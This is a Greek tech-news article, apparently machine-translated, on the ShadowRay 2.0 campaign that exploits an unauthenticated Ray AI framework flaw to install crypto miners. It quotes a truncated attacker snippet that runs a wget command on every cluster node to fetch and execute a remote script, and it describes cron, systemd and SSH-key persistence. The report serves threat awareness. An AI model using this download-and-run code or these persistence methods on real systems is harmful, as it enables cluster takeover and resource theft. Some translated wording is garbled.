Close Menu
TechReport.grTechReport.gr

    Subscribe to Updates

    Get the latest creative news from FooBar about art, design and business.

    What's Hot

    Νέα ευπάθεια ShadowRay Attack Exploit Ray AI-Framework για επίθεση σε συστήματα AI

    19 Νοεμβρίου 2025

    Το Meta μόλις κέρδισε το FTC επειδή το TikTok τρώει το μεσημεριανό του

    19 Νοεμβρίου 2025

    Η CISA προειδοποιεί για την ευπάθεια του Fortinet FortiWeb OS Command Injection που γίνεται αντικείμενο εκμετάλλευσης στη φύση

    19 Νοεμβρίου 2025
    Facebook X (Twitter) Instagram
    • Home
    • Πολιτική απορρήτου
    • Σχετικά με εμάς
    • Contact With TechReport
    • Greek Live Channels IPTV 2025
    Facebook X (Twitter) Instagram Pinterest Vimeo
    TechReport.grTechReport.gr
    • Phones
      • iPhone – iOS
      • Android
      • Samsung
    • Computer
    • Internet
      • Security
    • Entertainment
      • Gaming
    • Business
    • Cryptos
    • Gadgets
    • Technology
      • Science
      • Reviews
      • How-To
    • Health
      • Psychology
    TechReport.grTechReport.gr
    Αρχική » Νέα ευπάθεια ShadowRay Attack Exploit Ray AI-Framework για επίθεση σε συστήματα AI
    Security

    Νέα ευπάθεια ShadowRay Attack Exploit Ray AI-Framework για επίθεση σε συστήματα AI

    Marizas DimitrisBy Marizas Dimitris19 Νοεμβρίου 2025Δεν υπάρχουν Σχόλια4 Mins Read
    Share Facebook Twitter Pinterest LinkedIn Tumblr Reddit Telegram Email
    Share
    Facebook Twitter LinkedIn Pinterest Email


    Οι ερευνητές στον τομέα της κυβερνοασφάλειας ανακάλυψαν μια ενεργή παγκόσμια εκστρατεία hacking που αξιοποιεί ένα γνωστό ελάττωμα στο Ray, ένα πλαίσιο AI ανοιχτού κώδικα που χρησιμοποιείται ευρέως για τη διαχείριση κατανεμημένων εργασιών υπολογιστών.

    Με το όνομα ShadowRay 2.0, αυτή η επίθεση εκμεταλλεύεται την ευπάθεια CVE-2023-48022 για να καταλάβει σιωπηλά τον έλεγχο ισχυρών συμπλεγμάτων υπολογιστών AI και να τα μετατρέψει σε λειτουργίες εξόρυξης κρυπτονομισμάτων.

    Η καμπάνια αντιπροσωπεύει μια σημαντική κλιμάκωση από την αρχική ανακάλυψη του ShadowRay τον Μάρτιο του 2024, με τους επιτιθέμενους να χρησιμοποιούν εξελιγμένες τακτικές για να παραμείνουν κρυφοί ενώ εξάγουν μέγιστη αξία από παραβιασμένη υποδομή.

    Οι ερευνητές της Oligo Security αναγνώρισαν την εκστρατεία επίθεσης στις αρχές Νοεμβρίου 2025, ανακαλύπτοντας ότι οι παράγοντες απειλών που χρησιμοποιούν το όνομα IronErn440 έχουν οπλίσει τα νόμιμα χαρακτηριστικά ενορχήστρωσης του Ray σε εργαλεία για αυτοδιαδιδόμενες επιθέσεις.

    Αυτό που κάνει αυτή την απειλή ιδιαίτερα ανησυχητική είναι η τεράστια κλίμακα της έκθεσης. Ο αριθμός των εκτεθειμένων διακομιστών Ray παγκοσμίως έχει αυξηθεί από χιλιάδες κατά την αρχική ανακάλυψη σε περισσότερες από 230.000 περιπτώσεις σήμερα.

    Πολλά ανήκουν σε ενεργές startups, ερευνητικά εργαστήρια και παρόχους φιλοξενίας cloud, δημιουργώντας μια εκτεταμένη επιφάνεια επίθεσης.

    Αναλυτές ασφαλείας Oligo Security αναγνωρισθείς την επίθεση μετά από παρατήρηση κακόβουλου λογισμικού που γνωρίζει την περιοχή που διανέμεται μέσω του GitLab.

    Οι εισβολείς χρησιμοποίησαν αρχικά την πλατφόρμα DevOps για να παραδώσουν προσαρμοσμένα ωφέλιμα φορτία προσαρμοσμένα στη γεωγραφική τοποθεσία κάθε θύματος.

    Μετά την κατάργηση του κακόβουλου αποθετηρίου στις 5 Νοεμβρίου 2025 από το GitLab, οι παράγοντες απειλών μετέφεραν γρήγορα τη λειτουργία τους στο GitHub, επιδεικνύοντας αξιοσημείωτη λειτουργική ευελιξία.

    Μέχρι τις 10 Νοεμβρίου, είχαν δημιουργήσει ένα νέο αποθετήριο και συνέχισαν την καμπάνια τους με ακόμη μεγαλύτερη κομψότητα.

    AI επιτίθεται στην υποδομή AI

    Η επίθεση εκτυλίσσεται σε πολλαπλά συντονισμένα στάδια, ξεκινώντας με την αναγνώριση χρησιμοποιώντας το interact.sh, μια πλατφόρμα εκτός ζώνης που επιτρέπει στους εισβολείς να εντοπίζουν ευάλωτους διακομιστές χωρίς παραδοσιακή θορυβώδη σάρωση.

    Οι επιτιθέμενοι στέλνουν ανιχνευτές στοχεύοντας το μη προστατευμένο Jobs API του Ray, πυροδοτώντας επανακλήσεις από ευάλωτες περιπτώσεις. Μόλις εντοπιστούν οι στόχοι, εκμεταλλεύονται τον μη πιστοποιημένο πίνακα ελέγχου Ray για να υποβάλουν κακόβουλες εργασίες που εκτελούν αυθαίρετο κώδικα με δικαιώματα συμπλέγματος.

    Ray Cluster (Πηγή - Oligo)
    Ray Cluster (Πηγή – Oligo)

    Η πιο αξιοσημείωτη πτυχή είναι η χρήση ωφέλιμων φορτίων που δημιουργούνται από AI. Οι εισβολείς αναπτύσσουν κώδικα Python που ανακαλύπτει αυτόματα διαθέσιμους πόρους συμπλέγματος, υπολογίζει το 60 τοις εκατό κατανομή CPU και GPU για να αποφύγει τον άμεσο εντοπισμό και στη συνέχεια εισάγει εξορύκτες κρυπτονομισμάτων μεταμφιεσμένους ως νόμιμες διαδικασίες συστήματος.

    Τα ωφέλιμα φορτία επιδεικνύουν περίπλοκο χειρισμό σφαλμάτων και αυτοπροσαρμογή, υποδηλώνοντας ότι δημιουργήθηκαν ή βελτιώθηκαν χρησιμοποιώντας εργαλεία τεχνητής νοημοσύνης για την επιτάχυνση της ανάπτυξης ωφέλιμου φορτίου.

    Ένα κρίσιμο απόσπασμα κώδικα δείχνει τον μηχανισμό μόλυνσης πολλαπλών σταδίων. Το αρχικό ωφέλιμο φορτίο πρόσβασης χρησιμοποιεί το NodeAffinitySchedulingStrategy του Ray για να απαριθμήσει τους κόμβους συμπλέγματος και να αναπτύξει σενάρια μόλυνσης σε κάθε έναν:

    κόμβοι=[n for n in ray.nodes() if n.get('Alive', False)]
    cmd='wget -qO- https://gitlab.com/ironern440-group/ironern440-project/-/raw/main/aa_clean.sh && chmod +x aa_clean.sh && ./aa_clean.sh'
    [ray.get(ray.remote(lambda:subprocess.run(cmd,shell=True)).options(scheduling_strategy=NodeAffinitySchedulingStrategy...

    The attackers establish persistence through multiple mechanisms: cron jobs executing every fifteen minutes, systemd service hijacking, and SSH key injection into root accounts.

    They mask malicious processes by renaming them to appear as legitimate kernel workers like [kworker/0:0] και υπηρεσίες φίλτρου dns, που ουσιαστικά κρύβονται σε κοινή θέα.

    Mining Pool Statistics (Πηγή – Oligo)

    Αυτό που ξεχωρίζει αυτή την καμπάνια είναι η δυναμική του ενεργού ανταγωνισμού. Οι εισβολείς αναπτύσσουν σενάρια για να ανιχνεύσουν και να τερματίσουν τους ανταγωνιστές εξόρυξης κρυπτονομισμάτων και, στη συνέχεια, να αποκλείσουν ανταγωνιστικές ομάδες εξόρυξης μέσω κανόνων iptables και τροποποιήσεων του αρχείου κεντρικού υπολογιστή.

    Στοχεύουν ακόμη και πισίνες σε συγκεκριμένα λιμάνια που χρησιμοποιούνται από ανταγωνιστικούς παράγοντες απειλών, αποκαλύπτοντας ένα υπόγειο οικοσύστημα όπου πολλές εγκληματικές ομάδες μάχονται για τους ίδιους διακυβευμένους πόρους.

    Η προσαρμογή των υποδομών είναι εξίσου ανησυχητική. Για τα θύματα στην Κίνα, οι εισβολείς παραδίδουν ωφέλιμα φορτία για συγκεκριμένη περιοχή μέσω υπηρεσιών διακομιστή μεσολάβησης για να παρακάμψουν τους περιορισμούς δικτύου.

    Χρησιμοποιούν γεωγραφική ανίχνευση μέσω του ip-api.com, εκτελώντας διαφορετικά σενάρια για κινεζικούς και διεθνείς στόχους.

    Οι εισβολείς ενημερώνουν συνεχώς τα ωφέλιμα φορτία τους μέσω των δεσμεύσεων του GitLab, αντιμετωπίζοντας την υποδομή ως κώδικα και επιτρέποντας την εξέλιξη των τεχνικών τους σε πραγματικό χρόνο χωρίς να αναδιατάσσονται σε μηχανήματα-θύμα.



    VIA: cybersecuritynews.com

    Related Posts


    Χάκερ που εκμεταλλεύονται ενεργά Cisco και Citrix 0-Days in the Wild για να αναπτύξουν το Webshell
    Security

    Το NHS διερευνά την παραβίαση της Oracle EBS μετά την αξίωση Cl0p Ransomware Group
    Security

    Κρίσιμες ευπάθειες του SolarWinds Serv-U επιτρέπουν στους εισβολείς να εκτελούν τον κακόβουλο κώδικα από απόσταση ως διαχειριστής
    Security
    DNS GPU Hacking X ασφάλεια στον κυβερνοχώρο νέα για την ασφάλεια στον κυβερνοχώρο
    Share. Facebook Twitter Pinterest LinkedIn Tumblr Email
    Previous ArticleΤο Meta μόλις κέρδισε το FTC επειδή το TikTok τρώει το μεσημεριανό του
    Marizas Dimitris
    • Website
    • Facebook

    Ο Δημήτρης είναι παθιασμένος με την τεχνολογία και τις καινοτομίες της Samsung. Αγαπά να εξερευνά νέες ιδέες, να λύνει προβλήματα και να μοιράζεται τρόπους που κάνουν την τεχνολογία πιο ανθρώπινη και απολαυστική.

    Related Posts

    Security

    Η CISA προειδοποιεί για την ευπάθεια του Fortinet FortiWeb OS Command Injection που γίνεται αντικείμενο εκμετάλλευσης στη φύση

    19 Νοεμβρίου 2025
    Security

    Άνδρας από την Καλιφόρνια παραδέχτηκε ότι ξέπλυνε κρυπτονομίσματα που έκλεψαν σε ληστεία 230 εκατομμυρίων δολαρίων

    19 Νοεμβρίου 2025
    Apple

    Το Cloudflare εξηγεί πώς αφαίρεσε μεγάλα κομμάτια του Διαδικτύου

    19 Νοεμβρίου 2025
    Add A Comment
    Leave A Reply Cancel Reply

    Top Posts

    Οδηγός για το Πρόγραμμα «Ψηφιακές Συναλλαγές Β’» (2025) – Όσα πρέπει να γνωρίζουμε

    13 Νοεμβρίου 20251.155 Views

    Ο διαλογισμός έχει επικίνδυνες παρενέργειες. Τι λένε οι επιστήμονες;

    30 Οκτωβρίου 2025567 Views
    Αλλάζω Σύστημα Θέρμανσης και Θερμοσίφωνα οδηγός

    Αλλάζω Σύστημα Θέρμανσης και Θερμοσίφωνα: Πλήρης Οδηγός για 100.000 Νέους Δικαιούχους

    12 Νοεμβρίου 2025465 Views
    Stay In Touch
    • Facebook
    • YouTube
    • TikTok
    • WhatsApp
    • Twitter
    • Instagram
    Latest News
    Security

    Νέα ευπάθεια ShadowRay Attack Exploit Ray AI-Framework για επίθεση σε συστήματα AI

    Marizas Dimitris19 Νοεμβρίου 2025
    Technology

    Το Meta μόλις κέρδισε το FTC επειδή το TikTok τρώει το μεσημεριανό του

    Marizas Dimitris19 Νοεμβρίου 2025
    Security

    Η CISA προειδοποιεί για την ευπάθεια του Fortinet FortiWeb OS Command Injection που γίνεται αντικείμενο εκμετάλλευσης στη φύση

    Marizas Dimitris19 Νοεμβρίου 2025
    Most Popular

    Οδηγός για το Πρόγραμμα «Ψηφιακές Συναλλαγές Β’» (2025) – Όσα πρέπει να γνωρίζουμε

    13 Νοεμβρίου 20251.155 Views

    Ο διαλογισμός έχει επικίνδυνες παρενέργειες. Τι λένε οι επιστήμονες;

    30 Οκτωβρίου 2025567 Views
    Αλλάζω Σύστημα Θέρμανσης και Θερμοσίφωνα οδηγός

    Αλλάζω Σύστημα Θέρμανσης και Θερμοσίφωνα: Πλήρης Οδηγός για 100.000 Νέους Δικαιούχους

    12 Νοεμβρίου 2025465 Views
    About TechReport.gr

    Το TechReport.gr ιδρύθηκε με στόχο να αποτελέσει την πρώτη πηγή ενημέρωσης για όσους αναζητούν αξιόπιστη και εμπεριστατωμένη κάλυψη του τεχνολογικού κόσμου. Από την αρχή της λειτουργίας του, το site έχει δεσμευτεί στην παροχή ποιοτικού περιεχομένου που συνδυάζει ενημέρωση, ανάλυση και πρακτικές συμβουλές.
    • Email: [email protected]
    • Phone: +30 6980 730 713
    Copyright © 2025| TechReport.gr | A project by: Δημήτρης Μάριζας
    Λογότυπα, επωνυμίες, εμπορικά σήματα και γνωρίσματα ανήκουν στους νόμιμους ιδιοκτήτες.

    Our Picks

    Νέα ευπάθεια ShadowRay Attack Exploit Ray AI-Framework για επίθεση σε συστήματα AI

    19 Νοεμβρίου 2025

    Το Meta μόλις κέρδισε το FTC επειδή το TikTok τρώει το μεσημεριανό του

    19 Νοεμβρίου 2025

    Η CISA προειδοποιεί για την ευπάθεια του Fortinet FortiWeb OS Command Injection που γίνεται αντικείμενο εκμετάλλευσης στη φύση

    19 Νοεμβρίου 2025
    Facebook X (Twitter) Instagram Pinterest
    • Home
    • Technology
    • Gaming
    • Phones
    • Buy Now
    © 2025 TechBit.gr Designed and Developed by Dimitris Marizas.

    Type above and press Enter to search. Press Esc to cancel.